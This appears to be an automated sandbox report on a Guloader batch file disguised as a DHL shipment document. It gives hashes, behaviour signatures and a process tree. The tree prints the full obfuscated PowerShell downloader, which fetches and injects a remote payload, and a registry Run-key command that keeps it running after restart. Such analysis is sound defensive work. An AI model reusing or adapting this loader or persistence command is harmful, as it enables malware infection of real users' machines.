Analysis

  • max time kernel
    95s
  • max time network
    101s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-07-2024 08:50

General

  • Target

    Downloads/DHL_PT563857935689275783656385FV-GDS3535353.bat

  • Size

    6KB

  • MD5

    60186cd9a2e82835bc143c1fb4662b7e

  • SHA1

    880c7f14743f9759b30bcc28085949122f54c20e

  • SHA256

    b66081b0e5dfe21e03d1043700d7c05e65bda96ad33a6370c374217d5ae84405

  • SHA512

    98ca66c502178601cf1d568fb4b5ef122564f548eae2c82c9979207ea69398212f2b35571f3cc0696ec9edb70174a016c00ddd12fc26140d63196188e6f0f8b7

  • SSDEEP

    192:jOJVeUYLAKLt+IS0y+80TJco4Ga5y0p8te:QeAKZZS280FL3aw0aE

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Downloads\DHL_PT563857935689275783656385FV-GDS3535353.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4988
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDiadeHartcbundu Eror FreiHekst ProyRevaPwronrUn,ooTenot GipoBjr cTypeoPhycl RetTBedlyAchap .ide Sma]Repr:prec:AkklTNongl DatsPhen1Koor2Rume ');$urtesupper=$gawkihood[0];$enteroanastomosis= (Oktantals ' .le$hvidg.ykelKurtoTilkbH mpaCoutlDivi:A keMVerioSalvnUnr tSkyggstilo,istl,ammf ,raiBrowebro.rChlo= etNdiste UnswBil,- W iOColobAbonjAutoeMongccli tForu amS porySvedsF jlt lageDownmBrss.UnshNIn.ae I.tt.hal.Di.eWDevaeOxtabFredCPhillConfiForte.illnS.det');$enteroanastomosis+=$Mbelpoliturer[1];Oncogenes ($enteroanastomosis);Oncogenes (Oktantals 'b.gr$ .llMTutooLangnOwkrt D.ng,leao Hagl efifProti BlyeTonsrRemo.K.anHKr leUganaDrifdUdhneFe.drAcolssemi[ Fo.$EfteMB.uso PolralvevFintiSpe,nwife]Dok.=Inn,$I dvKre,nlkl.maAto,gSystekartfXylorBleniSkyfsRoletGreg ');$Makkede=Oktantals 'Unde$ PosMC.aco.xprnF.rstDemog lanoAmt.l,dlafSatsiPo aeHalvrJezr.SpeeDalphokiwaw Afsn.dstlVi ioLav,aWrapdPja.FGaduiS.nelGrebecons(,ell$Dec uFir,rLandtLigueHjalsNonouHavrp B spReane,roarre.s, E,s$RelaAIndifskrig MutrTalb)T.sk ';$Afgr=$Mbelpoliturer[0];Oncogenes (Oktantals 'Belr$Ln,ogOu,plEdapo PerbEx,eaSworl Des:Ud iEKig,gNonplDataaMegatAn,reStacrEskaeGro.sEkam=Flys(BygkT fr.eUnf s,rontgau.-wifoPBankaUplit .akhSelv Ked.$S.riA Bolf .umgDuchrBagg) Nav ');while (!$Eglateres) {Oncogenes (Oktantals 'K,rr$ calg Prol Ubeo An,bTra.aKernlMusl:UranD ConuSorrgOre a oinnBryg=Cen.$ForrtAfbrrUdrauR.vae Ani ') ;Oncogenes $Makkede;Oncogenes (Oktantals 'FormSldertBe.la V,rr eletTeks-BlepSLooklM.sse,entePr.npampo Olin4Macr ');Oncogenes (Oktantals 'Pidd$MissgScholFo,soAf,ib HjeaFreklCros:Vrt E A.dg.upelvendaLycot Re,ecracrDeave Subs nco=Bill(bossTAfveeUp rs lintSubs-ParaP RisaForet,andhMo.g Aarb$DecuAWoodfPatrgOculrInds) Pri ') ;Oncogenes (Oktantals 'G ur$ lgtg.efelShoooCivibBreaa UnclAppa:FaenE TaaxYethpPolylfareoLongdS.afeE,parSa.c=Scre$C mmg NemlMedioWhimb edua.ensl.nas: LocrAspeeHe,tnCanotT.skvSkibiU,kisWi,etGod,ehalonBe,o+,axc+Fini%Circ$RickgDermaMindwUndekStani C ih.renoAs.mo.ecudOpfy.SmutcflyvoRussu,ilhn PantLega ') ;$urtesupper=$gawkihood[$Exploder];}$Selvflelsers=333309;$Topfigur=29064;Oncogenes (Oktantals ' Op,$C,rrgHapplV ntodi.ibBrodaKni limpo:H,ejTRambrWigsvPonoa UnprPolee H tnKa o Skr=Lgne MgrGAu,ee Ra t Int-,edaCGhosoStavnTurbtMi pe spin nddtMusk Mind$ ,trAH.rsfD.srgMe,drRuts ');Oncogenes (Oktantals ' Dok$InexgDigtlU,weo flobeli,aB,dil,iot: Gl,PAn yaskoldSkj.d thae Forh Kona,lejtDihytPl deLattss,rkkItalyAkt eGentrBikonTlpeePlugsTruc h.ne=Codl Kula[HalvSS aayB.evsStagt ande orkmdimi. OmdCAdreoS,ren Es v.efueOverrReolt Imp]Mast: Veg: bibFsemir UnpoD,gtmTro,BStatasparsP.mpeAlmo6Hydr4gasaSSpant Me.rSlriiAsymn S ug am(Samn$PjkkTS uir InfvGge,aFremrHumeeUnfenGa.g)Co.q ');Oncogenes (Oktantals 'Stet$SmiggOprel AneoAc,obB ysaP aslSt.m:ForvUVr ebRep,e Pt.hUni,j Di.lPo.epEp.dsCapioVarmmReplmRevieBorts Pir .aca=Di.e Hem[Ca.bS StoyBuffsAndet Hane nkm.hae.kanaTConne uudxBnkptYeh..sp tERechn urgc LinoTu.bd Su icompn Alcg Uo.]Erad: ini:LandAmytiSAsseC sp.ITalbIGrip.JuleG D veAlmet,istSUdflt Storbestirssnn Unfg,erc( Na.$SighPTkkeaStridDesod BoheRobihOvera S ot,asttTurneBalas MankTvisy accePsycrStranC,ple Yd,s Sp.) Glu ');Oncogenes (Oktantals 'Unf.$ rodgMar,lSlagoCarpb M.naPsyklCyli:DiscBAlg iSlanoMen lCounoStang Trie MerrTaxanMelleS was.ver1D,al9U sa6Sigi=Delp$F lmUF,rsbMed eSa,ihGarnj YellsrtrpKolos resoBattm BejmFerreAspisC.nc.Serjs JewuThrob S rsLrketTrafrRejniSergnSt dgAnti( Jai$Jer,S ProeGroclCi.ivI urf AerlUdvaeB,uglchi,sArmhe.onnrAf is nde,,rko$InddT ecoSengpHimmfKlkkiIm.rg LytuTensrHaan)Pink ');Oncogenes $Biologernes196;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3708
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t"
        3⤵
          PID:4964
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDiadeHartcbundu Eror FreiHekst ProyRevaPwronrUn,ooTenot GipoBjr cTypeoPhycl RetTBedlyAchap .ide Sma]Repr:prec:AkklTNongl DatsPhen1Koor2Rume ');$urtesupper=$gawkihood[0];$enteroanastomosis= (Oktantals ' .le$hvidg.ykelKurtoTilkbH mpaCoutlDivi:A keMVerioSalvnUnr tSkyggstilo,istl,ammf ,raiBrowebro.rChlo= etNdiste UnswBil,- W iOColobAbonjAutoeMongccli tForu amS porySvedsF jlt lageDownmBrss.UnshNIn.ae I.tt.hal.Di.eWDevaeOxtabFredCPhillConfiForte.illnS.det');$enteroanastomosis+=$Mbelpoliturer[1];Oncogenes ($enteroanastomosis);Oncogenes (Oktantals 'b.gr$ .llMTutooLangnOwkrt D.ng,leao Hagl efifProti BlyeTonsrRemo.K.anHKr leUganaDrifdUdhneFe.drAcolssemi[ Fo.$EfteMB.uso PolralvevFintiSpe,nwife]Dok.=Inn,$I dvKre,nlkl.maAto,gSystekartfXylorBleniSkyfsRoletGreg ');$Makkede=Oktantals 'Unde$ PosMC.aco.xprnF.rstDemog lanoAmt.l,dlafSatsiPo aeHalvrJezr.SpeeDalphokiwaw Afsn.dstlVi ioLav,aWrapdPja.FGaduiS.nelGrebecons(,ell$Dec uFir,rLandtLigueHjalsNonouHavrp B spReane,roarre.s, E,s$RelaAIndifskrig MutrTalb)T.sk ';$Afgr=$Mbelpoliturer[0];Oncogenes (Oktantals 'Belr$Ln,ogOu,plEdapo PerbEx,eaSworl Des:Ud iEKig,gNonplDataaMegatAn,reStacrEskaeGro.sEkam=Flys(BygkT fr.eUnf s,rontgau.-wifoPBankaUplit .akhSelv Ked.$S.riA Bolf .umgDuchrBagg) Nav ');while (!$Eglateres) {Oncogenes (Oktantals 'K,rr$ calg Prol Ubeo An,bTra.aKernlMusl:UranD ConuSorrgOre a oinnBryg=Cen.$ForrtAfbrrUdrauR.vae Ani ') ;Oncogenes $Makkede;Oncogenes (Oktantals 'FormSldertBe.la V,rr eletTeks-BlepSLooklM.sse,entePr.npampo Olin4Macr ');Oncogenes (Oktantals 'Pidd$MissgScholFo,soAf,ib HjeaFreklCros:Vrt E A.dg.upelvendaLycot Re,ecracrDeave Subs nco=Bill(bossTAfveeUp rs lintSubs-ParaP RisaForet,andhMo.g Aarb$DecuAWoodfPatrgOculrInds) Pri ') ;Oncogenes (Oktantals 'G ur$ lgtg.efelShoooCivibBreaa UnclAppa:FaenE TaaxYethpPolylfareoLongdS.afeE,parSa.c=Scre$C mmg NemlMedioWhimb edua.ensl.nas: LocrAspeeHe,tnCanotT.skvSkibiU,kisWi,etGod,ehalonBe,o+,axc+Fini%Circ$RickgDermaMindwUndekStani C ih.renoAs.mo.ecudOpfy.SmutcflyvoRussu,ilhn PantLega ') ;$urtesupper=$gawkihood[$Exploder];}$Selvflelsers=333309;$Topfigur=29064;Oncogenes (Oktantals ' Op,$C,rrgHapplV ntodi.ibBrodaKni limpo:H,ejTRambrWigsvPonoa UnprPolee H tnKa o Skr=Lgne MgrGAu,ee Ra t Int-,edaCGhosoStavnTurbtMi pe spin nddtMusk Mind$ ,trAH.rsfD.srgMe,drRuts ');Oncogenes (Oktantals ' Dok$InexgDigtlU,weo flobeli,aB,dil,iot: Gl,PAn yaskoldSkj.d thae Forh Kona,lejtDihytPl deLattss,rkkItalyAkt eGentrBikonTlpeePlugsTruc h.ne=Codl Kula[HalvSS aayB.evsStagt ande orkmdimi. OmdCAdreoS,ren Es v.efueOverrReolt Imp]Mast: Veg: bibFsemir UnpoD,gtmTro,BStatasparsP.mpeAlmo6Hydr4gasaSSpant Me.rSlriiAsymn S ug am(Samn$PjkkTS uir InfvGge,aFremrHumeeUnfenGa.g)Co.q ');Oncogenes (Oktantals 'Stet$SmiggOprel AneoAc,obB ysaP aslSt.m:ForvUVr ebRep,e Pt.hUni,j Di.lPo.epEp.dsCapioVarmmReplmRevieBorts Pir .aca=Di.e Hem[Ca.bS StoyBuffsAndet Hane nkm.hae.kanaTConne uudxBnkptYeh..sp tERechn urgc LinoTu.bd Su icompn Alcg Uo.]Erad: ini:LandAmytiSAsseC sp.ITalbIGrip.JuleG D veAlmet,istSUdflt Storbestirssnn Unfg,erc( Na.$SighPTkkeaStridDesod BoheRobihOvera S ot,asttTurneBalas MankTvisy accePsycrStranC,ple Yd,s Sp.) Glu ');Oncogenes (Oktantals 'Unf.$ rodgMar,lSlagoCarpb M.naPsyklCyli:DiscBAlg iSlanoMen lCounoStang Trie MerrTaxanMelleS was.ver1D,al9U sa6Sigi=Delp$F lmUF,rsbMed eSa,ihGarnj YellsrtrpKolos resoBattm BejmFerreAspisC.nc.Serjs JewuThrob S rsLrketTrafrRejniSergnSt dgAnti( Jai$Jer,S ProeGroclCi.ivI urf AerlUdvaeB,uglchi,sArmhe.onnrAf is nde,,rko$InddT ecoSengpHimmfKlkkiIm.rg LytuTensrHaan)Pink ');Oncogenes $Biologernes196;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2496
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t"
            4⤵
              PID:1544
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3744
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2540
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2252

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u1hy2gvj.0vo.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Nedprioriterende200.Sig

        Filesize

        471KB

        MD5

        1677e735a9686765f8679aed9cfed513

        SHA1

        b3cd1eeb26e53bbc721e9a7ce43b5c42b50a70e8

        SHA256

        67f3e09ef042703fe0741bddc9ba1614ecc1de6ba22901386161c284287670cb

        SHA512

        ebd107c73ddfa92f39736da5a2bf982543dd6cb6fbf52a0cf297aa92373a2747e160c5581b1397162f175a2eec01a15a09cd337da61ce7667bb51a8523276ff1

      • memory/2496-37-0x0000000007D90000-0x000000000840A000-memory.dmp

        Filesize

        6.5MB

      • memory/2496-34-0x0000000005E40000-0x0000000006194000-memory.dmp

        Filesize

        3.3MB

      • memory/2496-38-0x0000000006970000-0x000000000698A000-memory.dmp

        Filesize

        104KB

      • memory/2496-17-0x00000000744FE000-0x00000000744FF000-memory.dmp

        Filesize

        4KB

      • memory/2496-18-0x0000000002B20000-0x0000000002B56000-memory.dmp

        Filesize

        216KB

      • memory/2496-20-0x00000000744F0000-0x0000000074CA0000-memory.dmp

        Filesize

        7.7MB

      • memory/2496-19-0x00000000055C0000-0x0000000005BE8000-memory.dmp

        Filesize

        6.2MB

      • memory/2496-21-0x00000000744F0000-0x0000000074CA0000-memory.dmp

        Filesize

        7.7MB

      • memory/2496-22-0x0000000005460000-0x0000000005482000-memory.dmp

        Filesize

        136KB

      • memory/2496-23-0x0000000005C60000-0x0000000005CC6000-memory.dmp

        Filesize

        408KB

      • memory/2496-24-0x0000000005CD0000-0x0000000005D36000-memory.dmp

        Filesize

        408KB

      • memory/2496-48-0x00000000744F0000-0x0000000074CA0000-memory.dmp

        Filesize

        7.7MB

      • memory/2496-35-0x0000000006440000-0x000000000645E000-memory.dmp

        Filesize

        120KB

      • memory/2496-36-0x00000000064E0000-0x000000000652C000-memory.dmp

        Filesize

        304KB

      • memory/2496-57-0x00000000744F0000-0x0000000074CA0000-memory.dmp

        Filesize

        7.7MB

      • memory/2496-49-0x00000000744F0000-0x0000000074CA0000-memory.dmp

        Filesize

        7.7MB

      • memory/2496-39-0x0000000007710000-0x00000000077A6000-memory.dmp

        Filesize

        600KB

      • memory/2496-40-0x0000000007470000-0x0000000007492000-memory.dmp

        Filesize

        136KB

      • memory/2496-41-0x0000000008410000-0x00000000089B4000-memory.dmp

        Filesize

        5.6MB

      • memory/2496-47-0x00000000744FE000-0x00000000744FF000-memory.dmp

        Filesize

        4KB

      • memory/2496-43-0x00000000089C0000-0x000000000E0D3000-memory.dmp

        Filesize

        87.1MB

      • memory/3708-14-0x00007FF8E62A0000-0x00007FF8E6D61000-memory.dmp

        Filesize

        10.8MB

      • memory/3708-45-0x00007FF8E62A0000-0x00007FF8E6D61000-memory.dmp

        Filesize

        10.8MB

      • memory/3708-44-0x00007FF8E62A3000-0x00007FF8E62A5000-memory.dmp

        Filesize

        8KB

      • memory/3708-12-0x00000265CDC20000-0x00000265CDC42000-memory.dmp

        Filesize

        136KB

      • memory/3708-13-0x00007FF8E62A0000-0x00007FF8E6D61000-memory.dmp

        Filesize

        10.8MB

      • memory/3708-60-0x00007FF8E62A0000-0x00007FF8E6D61000-memory.dmp

        Filesize

        10.8MB

      • memory/3708-2-0x00007FF8E62A3000-0x00007FF8E62A5000-memory.dmp

        Filesize

        8KB

      • memory/3744-65-0x0000000001090000-0x00000000067A3000-memory.dmp

        Filesize

        87.1MB

      • memory/3744-56-0x0000000001090000-0x00000000067A3000-memory.dmp

        Filesize

        87.1MB